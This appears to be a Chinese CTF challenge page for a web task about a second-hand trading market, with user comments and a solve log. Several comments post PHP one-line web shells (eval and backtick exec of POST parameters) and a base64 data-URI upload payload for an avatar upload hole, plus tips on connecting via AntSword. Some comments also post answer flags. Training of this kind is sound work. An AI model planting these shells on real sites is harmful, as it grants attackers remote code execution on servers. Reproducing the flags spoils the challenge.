xxx二手交易市场WEB 未解决

分数: 30 金币: 5
题目作者: Aman
一  血: dotast
一血奖励: 5金币
解  决: 2126
提  示:
描  述:
本人现实碰到的题目,无提示勿问
评论
zhuohao 19天前

蚁剑一直返回数据为空 一直连不上

回复 0

LLTVLL 1月前

一句话用这个 <?php eval($_POST['cmd']);?>,好像网上找的有的有问题

回复 0

BlueL1ght 7月前

<?php echo `$_POST[a]`;?>

回复 0

Daniel2023 8月前

<?php @eval($_POST['abc']);?> 上传data参数: data%3Aimage%2Fphp%3Bbase64%2C%2F9j%2FPD9waHAgQGV2YWwoJF9QT1NUWydhYmMnXSk7Pz4=

回复 0

vchopin 11月前

base64最后结尾要= 不然bp显示php syntax error,蚁剑连不上

回复 0

XRain 1年前

实战题才好玩,各种黑盒测试,我看到 data://image/jpeg 和保存的图片文件名后缀 jpeg,就猜想这两个 jpeg 是不是有关联,一测发现果然有。

回复 0

不会编程的崽 1年前

我不理解,POST['a'],死活连不上,POST['attack']就可以。。。。。

回复 0

三碗不过杠 1年前

flag{fd71260e4d41df49807229647056e7dd} 头像处文件上传,抓包base64编码写入一句话木马,上传蚁剑链接,重点就是改php,base

回复 1

冯飞99 1年前

这种实战题才是最爽的 flag{50352c0c4604ee60638e2579cbe3e141}

回复 1

wxy1343 1年前

flag{412d5e0844a33f36c9aa3d688425fb9f}

回复 0

WriteUp

image
nic016

5 金币

评分(8)

解题动态

shengjiang 攻破了该题 2天前
sraiL 攻破了该题 2天前
tonycai 攻破了该题 2天前
modeng 攻破了该题 2天前
龙天宇 攻破了该题 3天前
26ww 攻破了该题 8天前
jackflank 攻破了该题 8天前
13470772171 攻破了该题 8天前
vnuesa 攻破了该题 8天前
yaozhiwang 攻破了该题 9天前
zhuohao 攻破了该题 9天前
3113065322 攻破了该题 9天前
xuangou123 攻破了该题 13天前
wuyang 攻破了该题 13天前
forik 攻破了该题 14天前
adminasdfg 攻破了该题 14天前
小丁小丁少发神经 攻破了该题 15天前
1394658230 攻破了该题 15天前
8008120286 攻破了该题 15天前
鸿色无色 攻破了该题 15天前
问题反馈